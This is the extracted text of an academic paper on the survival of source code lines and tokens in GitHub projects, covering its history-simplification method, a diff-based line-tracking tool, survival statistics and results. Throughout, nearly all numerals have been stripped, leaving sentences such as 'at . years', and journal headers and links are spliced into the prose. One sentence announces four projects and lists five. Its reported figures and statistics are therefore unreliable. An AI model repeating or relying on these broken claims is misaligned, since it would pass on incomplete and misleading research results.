we performed the project selection through analytical processing of the ghtorrent data set (january version) based on the process described by gousios & spinellis ( ). the code information was obtained by downloading and processing each selected revision of the corresponding repository. other than the stated selection criteria, we did not perform any other manual adjustments to add popular projects or exclude obscure ones. we ensured that our data set did not include duplicated projects by pairing it with a dataset for github repository deduplication (spinellis, kotti & mockus, ). from the one duplicate and two triplicate sets we thus found we retained the repositories with the longer commit history. specifically, we chose github.com/droolsjbpm/drools over kiegroup/drools and droolsjbpm/guvnor, lede-project/source over openwrt-mirror/ openwrt and openwrt/packages, and doctrine/doctrine over doctrine/dbal. in total we analyzed projects, comprising at the end of the studied period thousands of source code files, millions of source code lines, millions of source code tokens, and . millions of examined commits. in terms of source code lines, we analyzed million code line lifetime events: the appearance of and the demise of millions of source code lines. in terms of individual source code tokens, we analyzed . billion code token lifetime events: the appearance of , and the demise of millions of source code tokens. key metrics of the projects we analyzed are listed in table . history simplification software development with distributed version control repositories is characterized by the frequent generation of feature development branches and their subsequent merging into a more mainstream trunk (german, adams & hassan, ). for example, the repositories we analyzed contained a total of thousand merges, or about three table descriptive statistics of the analyzed repositories and aggregate totals. metric min max median mean σ total all files , , , , , analyzed source code files , , , , , analyzed source code lines (thousands) , , , analyzed source code tokens (thousands) , , , , , committers , , ghtorrent project duration (years) analyzed branch duration (years) all commits (thousands) , analyzed commits (thousands) , line deaths (thousands) , , , , token deaths (thousands) , , , , , project stars , , , commit density (weekly %) spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://github.com/droolsjbpm/drools https://github.com/kiegroup/drools https://github.com/droolsjbpm/guvnor http://github.com/lede-project/source http://github.com/openwrt-mirror/openwrt http://github.com/openwrt-mirror/openwrt http://github.com/openwrt/packages http://github.com/doctrine/doctrine http://github.com/doctrine/dbal http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ thousand per project. as we detail below, merges confuse and complicate the processing of history and therefore required devising a scheme to deal with them. the confusion arises from the fact that a topological ordering implied by the directed acyclic graph structure of a project’s commit history will lose code changes or their time ordering. (a topological ordering of a directed graph is a linear ordering of its vertices such that for every directed edge ab from vertex a to vertex b, the linear ordering has a appear before b.) applying the typically-used three-way merge algorithm will result in the loss of code modifications, because the common ancestor will no longer be correctly represented. 
the complexity of merges has to do with how changes listed at the point of a merge can be automatically processed to obtain the code after it. in experiments we performed with diverse git output options we found that the output of git log and also git format-patch was not a reliable way to reconstruct the state of a project from its history (spinellis, a). consequently, the output could also not be used to track the lifetime of individual lines. although we did not look for the root cause of these problems in depth, we only encountered them when working with merges, which leads us to believe that they were indeed caused by merges. using git’s combined diff format for merges is also unlikely to help, because, according to git’s git diff documentation “combined diff format was created for review of merge commit changes, and was not meant for apply”. and if dealing with binary merges was not bad enough, handling n-way merges, such as those handled by git’s octopus-merge algorithm, added even more complexity to the problem. consequently, we decided to simplify the commit history into a linear ordering by removing the least essential branches and merges. the rationale behind this decision is that each merge point captures changes that have happened on both branches; if the time difference from the branch to the subsequent merge is not too large, then the represented lifetime of the affected lines does not change substantially. (see analysis in the “threats to validity” section.) an additional advantage of this approach is that it presents a commit sequence that is both topologically and temporarily ordered. to obtain this linear ordering, we took the topological ordering of the project’s commit graph and obtained the longest path in it. for directed acyclic graphs this path can be calculated in linear time, by having each vertex record its length as the maximum length of its parent neighbors plus one. then the longest path can be obtained by traversing the graph along the vertices with the maximum recorded values. figure illustrates an example of a commit graph and its longest path. the simplification of history resulted in the reduction of examined commits from . million to . million, meaning that we processed about % of all commits. lifetime tracking one could in theory obtain an indication regarding the lifetime of individual lines by sampling the output of the git’s blame command at various time points. however, this process is computationally intensive and will only provide an approximation. to address these issues we designed an online algorithm and a corresponding open source tool spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (named lifetime) that continuously tracks the lifetime of code lines across successive commits. tracking the lifetime of individual code lines across code commits is not trivial. an earlier study that demonstrated the estimation of code decay in the unix operating system source code over the period – , employed the git blame command to record the age of lines at the point of each one of releases (spinellis, b). changes over the sampled releases in the cardinality of sets representing lines born at a specific point of time were then used to estimate the lifetime of the corresponding lines. however, this method is quite inaccurate, since the lifetime estimates are bound between the dates of two successive releases. furthermore, it is also computationally expensive. 
the specific task required (on a massively parallel supercomputer) . core years cpu time, , cores, . tb ram, and gb of disk space. in fact, our case of k files × . m commits would require two orders of magnitude more resources. in common with most version control systems, git can output the differences in a file between two commits as a series of line additions and removals. (changes are represented as an addition and removal.) by default, this operation uses the popular myers algorithm (myers, ) to minimize the presented differences. in common with the work by zimmermann et al. ( ), we processed the output of unix (git) diff, rather than alternatives such as lhdiff (asaduzzaman et al., a), because diff operates fast and its output is machine-readable. a line may appear in the output of a commit’s differences for several reasons: ( ) actual deletion—within a retained file or through a file’s deletion, ( ) changes in identifier names, ( ) other non-whitespace changes, ( ) movement to another part of the same file, ( ) movement to another file, ( ) change of indentation, or ( ) other cosmetic— whitespace—changes. reasons and are definitely signs of the line’s death that are relevant to this study: a (most-probably) functional modification. our methods also consider as a line death reasons and , because it is difficult to identify such changes with the tools we employed. we deal with these potential shortcomings by expanding our methods to track changes of individual tokens and by measuring the effect of line moves. we were also able to continue tracking through their lifetime lines that change due to reasons – . first, we set git diff to ignore all changes in a line’s whitespace. this filtered out noise introduced by indentation adjustments induced through other changes as well as figure branch graph path length attributes and the longest path. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ changes in a file’s tab (hard vs soft tabs) or end-of-line (the use of line feed and carriage return) representation. second, we configured git diff to detect file renaming and copying, in order to follow cross-file code movements. an example of the git diff output format processed by the lifetime tool we built appears in listing . line is a custom commit header we employed, containing the commit’s sha identifier and its timestamp. the commit involves changes to two files; lines and show the old and new names of the files being compared. when a file is removed or newly added the new file name (in the case of removals) or old file name (for additions) is /dev/null (the unix empty file). lines – and – contain metadata that is not important for the task at hand. lines – show the addition of two lines at the new file range + , listed in the @@ line. lines – do the same for the second (newly-created) file. lines – show a line’s change: line of the old version’s file is replaced by line in the new version’s file. in the new file version. a series of extended headers can appear after the diff line to indicate file deletions, renames, and copies, which git detects by applying heuristics in the compressed repository state snapshot stored for each commit. the lifetime program works by processing a series of git diff outputs (such as those detailed in the preceding paragraph) using the state machine depicted in fig. . 
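as an illustration only of how such a diff stream can be produced, successive commits of the linearized history could be compared with standard git options; the exact invocation, custom commit header, and detection thresholds used by the lifetime tool may differ.

    import subprocess

    def commit_diff(repo, old, new):
        # textual differences between two commits, ignoring whitespace noise and
        # following renamed and copied files, as described above
        result = subprocess.run(
            ["git", "-C", repo, "diff",
             "--ignore-all-space",   # skip indentation and other whitespace changes
             "--find-renames",       # detect renamed files
             "--find-copies",        # detect copied files
             old, new],
            capture_output=True, text=True, check=True)
        return result.stdout

    # feeding the output for each successive pair of linearized commits to the
    # state machine described next yields the line addition and removal events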
state transitions take place when input lines match the regular expressions shown in the diagram (figure : state machine for git diff output processing).

listing : example of git diff output

    commit dfdcb a […]de b d
    diff --git a/main.c b/main.c
    index da.. a f d
    --- a/main.c
    +++ b/main.c
    @@ - , + , @@
    +#include "message.h"
    +
    @@ - + @@ main(int argc, char *argv[])
    - printf ("hello, world");
    + printf (message);
    diff --git a/message.h b/message.h
    new file mode
    index ..be a e
    --- /dev/null
    +++ b/message.h
    @@ - , + @@
    +#define message "hello, world"

(the lifetime tool is available in this study's source code package at https://doi.org/ . /zenodo. and also on github https://github.com/dspinellis/code-lifetime.)

the operations can be expressed through the following notation.

- the timestamp t_c associated with the commit currently being processed.
- a partial function t : (f, l) → t_b mapping each integer-numbered line l of file f onto its birth time t_b.
- another partial function b : f → {true, false}, that yields true when a file f contains binary data (e.g., an image).
- the last line of each file, f_e = max({l : t(f, l) ≠ ⊥}).

the rules applied when processing the git diff data are the following.

1. for each code line numbered l added to file f that the program encounters (e.g., lines , , , in listing ), it remaps existing timestamps from l until the end of the file f_e in the map t it maintains to make space for the new line, and it inserts an entry in the timestamp map with the current timestamp t_c ( in line of listing ).

    ∀ l′ ∈ (l .. f_e): t′(f, l′ + 1) = t(f, l′)
    t′(f, l) = t_c

2. for each code line numbered l deleted from file f that the program encounters (e.g., line in listing ), it outputs a tuple with the line's birth time and the time of its demise, (t(f, l), t_c), and it remaps the timestamps of the lines from l until the end of the file f_e to close up the gap of the deleted line.

    ∀ l′ ∈ (l .. f_e − 1): t′(f, l′) = t(f, l′ + 1)
    t′(f, f_e) = ⊥

3. when changes to a binary file f are encountered, this file is marked as binary in a map b, and no further output is ever performed on operations on that file. this is needed because changes to binary files are not identified in terms of lines, so further changes when a file reverts to text format will not have correct timestamps to refer to.

    b(f) = true

4. when a file f_a is identified as copied to file f_b, new map entries are established with the original line birth dates and the binary file status is also transferred to the new file.

    ∀ l ∈ (1 .. max(f_ae, f_be)): t(f_b, l) = t(f_a, l)
    b(f_b) = b(f_a)

5. when a file f_a is identified as renamed to file f_b, new map entries are created as above, and the existing ones are removed.

6. after processing all commits, lifetime outputs tuples with the birth timestamps of all lines that are still alive and the word alive.

    {(t(f, l), alive) : t(f, l) ≠ ⊥}

the processing is complicated by the fact that all change references to the existing state of a commit refer to the state before any change has been applied to any of the files; changes are not supposed to be applied while processing a commit.
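the first two rules can be sketched in a few lines of python; this is an illustration only, with a hypothetical in-memory map keyed by (file, line number) and hypothetical function names, not the actual lifetime implementation.

    timestamps = {}   # the map t: (file, line number) -> birth timestamp
    deaths = []       # emitted (birth, death) tuples

    def last_line(f):
        numbers = [l for (g, l) in timestamps if g == f]
        return max(numbers) if numbers else 0   # f_e, or 0 for an empty file

    def add_line(f, l, t_c):
        # rule 1: shift later lines down to make room, then record the birth time
        for i in range(last_line(f), l - 1, -1):
            timestamps[(f, i + 1)] = timestamps[(f, i)]
        timestamps[(f, l)] = t_c

    def delete_line(f, l, t_c):
        # rule 2: report the line's lifetime, then close the gap it leaves behind
        deaths.append((timestamps[(f, l)], t_c))
        e = last_line(f)
        for i in range(l, e):
            timestamps[(f, i)] = timestamps[(f, i + 1)]
        del timestamps[(f, e)]

note that this sketch applies each change immediately, whereas, as just noted, the real tool must not modify the state while a commit is still being processed.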
for example, if a commit renames file fa to fb and fb to fa the names of the two files will be correctly swapped. also, changes to a file that has been copied or renamed in the same commit refer to the name of the file before the corresponding operation. this complication is addressed by recording all changes in a queue as instructions to add or remove elements from the timestamp map t. when all elements of a commit have been processed, a routine replays the recorded changes on the current state to generate the new one. considerable effort was invested in making the lifetime program easy to test and troubleshoot. this was needed for three reasons. first, the output of git-diff seems to be only informally defined and involves many special cases. second, tracking line timestamps by hand to verify the program’s operation is a complex and error-prone process. third, errors were encountered in the middle of processing data hundreds of gigabytes in size; isolating these errors proved to be a challenging task. in order to help testing and troubleshooting the lifetime program supports eight command-line options that configure it to output diverse data regarding the processing it performs. a separate option can be used to terminate the processing at a specific commit, thus allowing the examination of the data at the given time point. the most important of spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the debug options, modifies the program’s operation to store in the map t the complete content of each added line, rather than the current timestamp tc. then, when a line is removed, it is compared with the map’s content to verify that the two match. any differences signify a failure in the process to record the changes. such differences allowed us to find that the output of git log and git format-patch were not trustworthy enough for our purposes. furthermore, the same debug option uses the map’s contents to reconstruct a copy of the project’s file tree, when all its commits have been processed. comparing the file tree against a checked-out version of the project allows the end-to-end verification of the program’s operation. the lifetime program is accompanied by two git repositories containing tens of diverse commit cases. a test script is used to compare the reconstructed state against the original one at the end of each commit. analysis of individual tokens although lines of code are often used to measure software and its evolution, tracking changes at the level of lines can threaten the results’ validity. specifically, small changes, such as renaming an identifier, will appear to change many lines. in addition, a line may appear to change through edits unrelated to it, such as the addition of a brace when a statement is added below it. consequently, it would be valuable to track evolution at the level of individual tokens rather than lines. we designed and implemented a process and tools to track the birth and demise of individual tokens based on an idea by german, adams & stewart ( ). this involves creating a synthetic git repository where files are stored as one token per line. the setup can be traced to the more general concept of using a synthetic git repository to track arbitrary fine-grained elements (hata, mizuno & kikuno, ). the downloaded repositories amount to gb and the synthetic ones to gb. 
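purely as an illustration of the one-token-per-line representation (the actual conversion is done by the per-language tokenizer described next, not by a regular expression), a single statement could be stored as follows.

    import re

    def naive_token_lines(code_line):
        # naive sketch: string literals become an ellipsis, then each token goes on
        # its own line; real lexical analysis also handles comments, operators, etc.
        code_line = re.sub(r'"[^"]*"', "...", code_line)
        return re.findall(r"[A-Za-z_]\w*|\.\.\.|\S", code_line)

    print("\n".join(naive_token_lines('printf("hello, world");')))
    # printf
    # (
    # ...
    # )
    # ;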
tracking changes between revisions in such a repository will show the addition and removal of individual tokens, rather than complete lines. all other workflow and tools can remain the same. we created tokenized versions of the selected repositories through two tools: a file tokenizer and a repository tokenizer. the repository tokenizer is a perl script that acts as a filter between a git fast-export and a git fast-import command. it reads the dump of the original repository generated by the git fast-export command, queueing file content blobs it encounters, while passing the remaining data unchanged to its output. when it reads a commit packet, it matches the file extensions of the committed files against previously encountered blobs. for any blob whose file extension matches the languages supported by the file tokenizer, the repository tokenizer invokes the file tokenizer to convert the file into tokens, dumping the tokenized results on its output as the corresponding blob. to tokenize the contents of each file, we used the tokenizer tool, which splits its input into tokens using simple look-ahead lexical analysis (spinellis, ). support for each language is provided through a separate lexical analyzer to cater for differences in operators, reserved words, commenting, and string delimiters. through command-line options we directed the file tokenizer to split its input into a token per line replacing the spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ content of strings and comments with an ellipsis (…), thus also allowing us to ignore non-code changes. analysis of moved lines given that the file differencing program we employed will not report line moves within the same file, we attempted to quantify the effect of this behavior on our results. for this, we developed a tool that uses heckel’s linear time differencing algorithm (heckel, ), which does attempt to locate line moves. although the output of this program is not suitable for running the fully fledged analysis, its summary of added and removed lines can be tallied against that of the git diff program to compare their performance in detecting lines that have not changed. by configuring git diff to run the alternative program between all successive revisions, we found that heckel’s algorithm, despite taking into account line moves, reports . % more line additions and deletions than git’s stock algorithm. while differencing algorithms can always be tweaked to handle elaborate special cases, this result indicates that the differencing program we employed for the study works pretty hard to identify a competitively small set of differences, and that taking into account line moves using heckel’s algorithm would reduce the accuracy of our results by failing to track about % more lines. effect of the histogram algorithm following the recommendation of a recent systematic survey of studies that use diff (nugroho, hata & matsumoto, ), we also examined whether the use of git’s histogram difference algorithm would substantially alter our results. using a process similar to that described in the “analysis of moved lines”, we measured the differences in the reported added and deleted lines between the myers and the histogram algorithms. both differences were below . %: . % for deletions and − . % for additions. the effect’s small size is not surprising, because the histogram algorithm mainly improves the readability of the provided patch. 
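a sketch of how the added and deleted line counts of the two algorithms can be tallied for one pair of revisions with stock git options follows; aggregating over all successive revisions and projects, as done in the study, is omitted.

    import subprocess

    def added_deleted(repo, old, new, algorithm):
        # added and deleted lines reported by git diff under a given algorithm
        out = subprocess.run(
            ["git", "-C", repo, "diff", "--numstat",
             f"--diff-algorithm={algorithm}", old, new],
            capture_output=True, text=True, check=True).stdout
        added = deleted = 0
        for row in out.splitlines():
            a, d, _path = row.split("\t", 2)
            if a != "-":                      # binary files are reported as "-"
                added, deleted = added + int(a), deleted + int(d)
        return added, deleted

    myers = added_deleted(".", "HEAD~1", "HEAD", "myers")
    histogram = added_deleted(".", "HEAD~1", "HEAD", "histogram")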
statistical analysis

if we had the time of birth and the time of death for each line of code and token in a project we could estimate the median lifespan of the line or token directly, by calculating lifespans and finding their median value. we are interested in the median and not the mean, because lifetimes may be skewed, so the mean, or average, would not give a representative metric. unfortunately, we do not have the lifespans of all lines and tokens that we have tracked in the repositories we have examined. we do have their birth timestamps, but there are many lines and tokens that are still alive at the end of our follow-up period: these are the lines and the tokens that are part of the code base of a project at the last time we check. their lifespans are right censored; they extend to the future. across projects, the mean of the percentage of right censored lines is . % and the median is . %; for tokens, the corresponding values are . % and . % respectively.

to estimate the median lifespan under such circumstances we use the kaplan–meier or product-limit survival estimate (kaplan & meier, ). if our measurements take place at times t_1 < t_2 < … < t_n and at time t_i we have n_i that are alive, of which d_i die right at that moment, then the probability of being alive at time t_i is given by:

    s(t_i) = s(t_{i−1}) (n_i − d_i) / n_i

the recursive definition assumes t_0 < t_1 and s(t_0) = 1. in our data, lines and tokens are born at different times during a project. since we are interested in their lifespans and not at the chronological times of birth and death, we work only with the differences between birth and death timestamps. that means that the times t_i are time offsets; time 0 is the birth time for all lines. for example, if we have a line with a lifespan from t_i to t_j we take for its death time the difference t_j − t_i. for the lines and the tokens that are right censored, we assign as their death timestamp the latest timestamp in the project. we also flag them as being alive, which means that in the kaplan–meier estimation their lifespan will be taken to be at least until the latest project timestamp. note that we do not have censoring due to other causes, for example, a line being "lost" somewhere in the project's timeline, without being able to follow it up.

the function s(t) is stepwise, with constant values between the different t_i. it estimates the survival function of a data set, which is formally defined as follows: s(t) is the probability that an individual (line of code in our case) survives longer than a time t:

    s(t) = p(T > t)

in the above, T is a variable indicating the time of death. we would also like to know what is the risk of dying at t. for this, we have to turn to the hazard function, or hazard rate, h(t), which is the rate at which an individual that has made it to time t will die within an interval δt that tends to zero:

    h(t) = lim_{δt→0} p(t ≤ T < t + δt | T ≥ t) / δt

we have three alternative hypotheses regarding the hazard function:

- individuals run the same, constant, risk of death at each time t.
- individuals run a higher risk of death when they are young; these are populations whose demographics are characterized by high infant mortality.
- individuals run a higher risk of death when they are old; these are populations whose frailty increases with age (senescence).
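before turning to these hypotheses, a minimal sketch of the median-lifespan estimation with the python lifelines package, which the "threats to validity" section reports was used for these calculations; the data below are hypothetical, and lifelines parameterizes the weibull model differently from (though equivalently to) the form given next.

    import numpy as np
    from lifelines import KaplanMeierFitter, WeibullFitter

    # hypothetical data: lifespan of each line in years, and whether its death was
    # observed (False means still alive at the end of the study, i.e., right censored)
    durations = np.array([0.1, 0.4, 1.2, 2.5, 3.0, 3.0, 3.0])
    observed = np.array([True, True, True, True, False, False, False])

    kmf = KaplanMeierFitter().fit(durations, event_observed=observed)
    print(kmf.median_survival_time_)   # time by which half of the lines have died

    wf = WeibullFitter().fit(durations, event_observed=observed)
    print(wf.rho_)   # shape: < 1 infant mortality, = 1 constant hazard, > 1 senescence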
to test these hypotheses we will check whether the hazard function for lines of code follows a weibull distribution, a standard parametric model in survival analysis that has been used widely in science and engineering (padgett, ). the weibull distribution specifies the following hazard rate, with two parameters λ > 0 and a > 0:

    h(t; λ, a) = aλt^(a−1)

the corresponding survival function is:

    s(t; λ, a) = e^(−λt^a)

the parameter a is called the shape parameter and the parameter λ is called the scale parameter. together they determine the form of the corresponding weibull probability density function f(t; λ, a) = aλt^(a−1) e^(−λt^a). the parameter λ stretches or contracts the distribution along the x axis. there are three different cases for the parameter a:

- if a < 1, the hazard rate decreases over time.
- if a = 1, the hazard rate is constant.
- if a > 1, the hazard rate increases with time.

the three alternatives for a mirror the three hypotheses we want to check and can be the basis of the statistical analysis of the code aging process.

results and discussion

rq

the kaplan–meier estimate provided the median lifespan for the projects we examined. this is the point in time at which % of the population has died. figure shows the kaplan–meier survival functions for all projects, in increasing order (figure : kaplan–meier median lifespan estimates; lifespan estimates per project, in increasing order, calculated for lines and for individual tokens). the minimum line median lifespan, at . years (about . h), is for the project handbrake; the maximum line median lifespan, at . years, is for collectd, while for torque and boto the lifespan could not be calculated, because not enough lines had died by the end of the data collection period to be able to get to the % point. we investigated the extremely low value for handbrake. it appears that the project features large commits and incorporates the entire mac sparkle framework within the repository. turning to tokens, the minimum median lifespan was for odoo at . years. there were four projects for which no median lifespan could be calculated: thrift, mpc-hc, boto, collectd, torque. the maximum median lifespan that could be calculated was for docuwiki, at . years.

taking all line results together, the median of the median lifespans is at . years, while the % percentile is at . years and the % percentile is at . years. for tokens, the corresponding median is . years, the % percentile . years, and the % percentile . years. these results indicate that lines and their individual tokens are durable rather than perishable, with lifespans measured in years rather than days. figure shows the histograms of the median lifespans. the growth of projects is punctuated with bursts of additions and deletes; these occur when a large body of code is imported or removed en masse from the project. we examined whether the estimates would change if we remove outliers. we therefore carried out the same statistics after removing the lines and tokens that were introduced in commits that were in the top % of commit size in every project. the line median lifespan moved to . years, an increase of . %; the token median lifespan moved to . years, an increase of . %.
that is not trivial, but it does not change the overall picture.

to determine whether the differences in the medians between the line-oriented and the tokenized data can be explained away by chance, we carried out a wilcoxon signed-rank test. the null hypothesis was that the two median populations come from the same distribution. the test allowed us to reject the null hypothesis with high probability (p-value close to zero). it follows that code tokens lead longer lives than code lines; after all, every token that changes affects the line in which it belongs, but the opposite does not hold. (figure : histogram of median lifespans; distributions of median lifespans of lines and individual tokens.)

as project lifespans vary, the variability of code lifespans may be explained by the variability of project lifespans: code in longer-lived projects may live longer than code in younger projects. to investigate that, we performed correlation tests between median line lifespans and project lifespans. the spearman correlation test for lines produced ρ = . (p < . ), which indicates a slight monotonically increasing relationship between median line lifespan and project lifespan. the pearson correlation test produced r = . (p ≪ . ); the difference with the spearman result can be explained if the relationship is monotonically increasing, but not linear. for tokenized data, the correlation was a bit stronger, with spearman ρ = . (p ≪ . ) and pearson r = . (p ≪ . ). figure shows a scatterplot of line and token median lifespans with a regression line (figure : line median lifespan on project lifespan; scatterplots and regression lines of the lifespan of each project vs the median lifespan); the regression coefficient for lines is . and for tokens is . . in all, although the effect of project age is statistically significant, its effect on the longevity of code is small.

rq

moving beyond the estimates of median line lifespan, we checked the three hypotheses on hazard rates by fitting a weibull distribution to each project's data. the fit was performed on the full line data of each project; we are interested in the fitted weibull a parameter that controls the shape of the distribution and therefore the evolution of the hazard rate. the results of the fit showed that for all projects the a parameter is less than one, indicating a process with high infant mortality. figure shows the weibull fitted distributions for all projects, each line being a project. the median of a is . , while the % percentile is . and the % percentile . . the situation is almost the same if we do the same analysis for tokens. two projects have a ≥ 1 (by a whisker, ojs with a = . and xmbc with a = . ). the median is . , the % percentile . and the % percentile . .

from the above, it follows that young lines run higher risks. old lines die as well, but younger ones at higher rates. this suggests a software development process where lines that are introduced into the code base of the project are subject to more change pressures.
a line that has just been committed may not have been as thoroughly tested as older lines; it may need to be modified to accommodate factors that had not been foreseen; lines just added may impact more those recently introduced than parts of the older code base. conversely, old lines seem to have proved their mettle. they have survived a long time and they are less likely to suffer changes than young lines. in a more negative light, old lines may gain a “don’t touch” status, where developers are wary to change anything that works, which therefore lives on. whichever may hold, that a line lives on because it is really valuable or because nobody dares to change it, developers should be aware that they work for the long term. a line of code may live for years, well beyond the developers’ involvement with a project or their ability to remember the rationale behind a cryptic choice. consequently, our findings provide one more reason for writing clear and well-documented code. our findings also support the need to manage and perform what have been called anti-regressive changes (lehman, ) to the software (effort required to combat the growth in complexity) in order to avoid the accumulation of technical debt (kruchten, nord & ozkaya, ). code lines that live long are likely to become out of sync with respect to the software’s evolving architecture, design, apis, third-party libraries, language standards, as well as coding conventions and practices. as we have shown, such lines are not very likely to go away. consequently, it is required to find those code lines that need care and bring them up to scratch. this is typically accomplished through the detection of code smells and the corresponding refactoring of code (fowler, ). figure hazard rates of lines of code per project. for all projects, the hazard rate for lines decreases with time, i.e., older lines run a smaller risk of dying. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rq a we investigated whether particular features of lines are conducive to more changes. we ran a linear multiple regression model for each project with the lifespan of a line as the dependent variable and as independent variables the length of the line, the indentation, the number of strings in the line, whether it (or part of it) is a comment, the number of commas, the number of brackets, the number of access operators (method and pointer), the number of assignments, the number of scope delimiters, the number of array accesses, and the number of logical operators. the elements we tested point to code smells or other code features that may make the code less stable, affecting its lifetime. we selected the aforementioned features for the following reasons. a large number of brackets may indicate complicated conditions or expressions, or long statements, which are a known code smell (sharma, fragkoulis & spinellis, ). a large number of commas may indicate a long parameter list smell (mäntylä & lassenius, ). strings may indicate the entanglement of presentation elements with business logic (nguyen et al., ). the results showed a very low fit (r < . ) for all projects, apart from canu with r = . , handbrake, with r = . , and pyparallel, with r = . . 
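such a per-project model could be sketched with statsmodels as follows; the data frame and the reduced feature set are hypothetical stand-ins for the per-line measurements listed above.

    import pandas as pd
    import statsmodels.api as sm

    # hypothetical per-line measurements for one project (the study uses the full
    # feature list given above: strings, comments, brackets, operators, and so on)
    lines = pd.DataFrame({
        "lifespan":    [0.3, 2.1, 4.0, 0.8, 1.5, 3.2, 0.2, 2.7],
        "length":      [12, 80, 35, 60, 25, 40, 95, 30],
        "indentation": [0, 8, 4, 4, 0, 4, 12, 8],
        "commas":      [0, 3, 1, 2, 0, 1, 4, 0],
    })

    X = sm.add_constant(lines[["length", "indentation", "commas"]])
    model = sm.OLS(lines["lifespan"], X).fit()
    print(model.rsquared)   # goodness of fit of the linear model
    print(model.pvalues)    # significance of each coefficient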
the regression coefficients were found with very small p values, which indicates that the influence they have on the lifespan cannot be explained away by chance, but the whole linear model, and therefore each particular predictor in it, accounts for a tiny part of lifetime variance. rq b to conduct a similar analysis for tokens, we divided tokens in four types: identifiers ( million), numbers ( million), keywords ( million), and other tokens (mainly operators and punctuation— million). we ran pairwise mann–whitney u tests between the lifetimes of different token types for each project. the distributions of the lifetimes of token types per project are different in the vast majority of projects (ranging from the distributions of / projects for identifiers vs other tokens to the distributions of / projects for keywords vs numbers). however, when we take the medians of the lifetimes of different token types for all projects, their distributions are then all indistinguishable. as for lines, we could not determine that some particular types of tokens are associated with longer lifetimes across projects. rq c a different factor that may influence the lifespan of a line is the committer who enters, alters, or deletes a line. we examined possible correlations between the lifespan and the number of developer commits in the project and between the experience and the tenure of the developer in the project. for this, we looked at commits in the middle year of the examined period ( ), thus providing at least . years time to gather line and developer data and then another . for lines to disappear. we used the number of a developer’s project commits until each examined commit as a measure of a developer’s experience, and the difference in time between the developer’s first project commit and the examined one as a measure of the developer’s tenure in the project. we carried out both spearman and pearson correlation tests to examine the relationship between line lifetime and the spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experience and tenure of the developer who added the line. we could not identify a single rule across projects. in some projects, committer activity and tenure appear to be positive correlated with line lifespan, in other projects they appear to be negative correlated, and in most projects the correlation seems to be weak: the median is close to zero. the situation changes when we examine the lifetime of lines vs the experience and tenure of the author who removed them: we find that the lifetime is positively correlated with developer experience, that is, more experienced developers remove longer-lived lines. the median of the correlation of line lifetime and developer experience across projects is . (spearman) and . (pearson) for p < . ; for the correlation of line lifetime and developer tenure the medians are . (spearman) and . (pearson) for p < . . alternatively, the above can mean that it takes experienced developers to remove a long-lived line, bringing us back to the “don’t touch” status. the “don’t touch” status also hints at a different facet of the way lines are handled. could it be that lines are more likely to be changed or deleted by the same developer who entered them into a project in the first place, rather than by a different committer? we contrasted, for each project, the lifetimes of lines that are changed by the same developer against those that are changed by a different one. 
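such a per-project contrast can be sketched with scipy; the two lifetime arrays below are hypothetical.

    from scipy.stats import mannwhitneyu

    # hypothetical lifetimes (in years) of removed lines, split by whether the
    # developer who removed a line is the one who originally introduced it
    same_author = [0.2, 0.5, 1.1, 1.8, 2.0]
    different_author = [0.9, 1.7, 2.4, 3.5, 4.1]

    statistic, p_value = mannwhitneyu(same_author, different_author)
    # a small p-value means the two lifetime distributions differ for this project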
the two distributions are different (checking with the mann–whitney u test) for all projects except drush and grails-core. in most projects, the median lifetime of lines removed by the same author who entered them is less than the median lifetime of lines removed by a different author ( / ); and similarly for the means ( / ). in short, lines are more likely to be touched by their original author (see also fig. ). figure per project lifetime medians for same and different committers. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rq d we investigated whether project size affects the longevity of lines and tokens. we checked the number of lines and the number of tokens for all commits, using both pearson and spearman correlations. we found only slight positive correlations, r = . (p < . ),for the pearson correlation (but not the spearman) for both the number of lines and the number of tokens in a project. of course, the size of the project may be related to its age and indeed the results are concordant with our preceding investigation on code lifespans and project lifespans. rq e turning to programing languages, although we expected to find greater lifespans in languages with features that promote modularity, we did not detect that. table shows that median lifetime estimates over projects grouped by programing language (excluding a single project in c#). if anything, we see that, for instance, c exhibits greater lifespans than c++. however, note that none of the differences between programing languages was statistically significant at the . level using the mann–whitney u test. threats to validity internal validity thankfully, by basing our study on historical data, many threats that typically appear in evolving experiments, such as design contamination, experimental mortality, and maturation, can be ruled out. the main remaining threats are associated with confounding factors, noise in the data, commit granularity, file differencing, and statistical methods. an important consideration is that the independent variable we used in our study, a code line’s age, can encompass many other variables. specifically with the passage of time, the number of faults in a line will decrease as these are winnowed out (ozment & schechter, ), the developers’ familiarity will increase as they read it again and again, and the line’s afferent couplings may increase as other code may depend on its elements. another factor is noise in the data we used. although we were careful to include (through simple measures) in our study what has been termed engineered software projects (munaiah et al., ), we cannot exclude the possibility that the underlying commit data contain infelicities that may influence our results. these include the addition or removal of large third-party software systems, wrongly set commit dates, history rewrites table languages and kaplan–meier (km) estimates. language # projects median median line km token km php . . c++ . . python . . java . . c . . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performed after the code was written, and errors introduced when one type of repository (e.g., cvs) gets converted into git. third-party code changes can have a significant effect on software evolution. gall et al. 
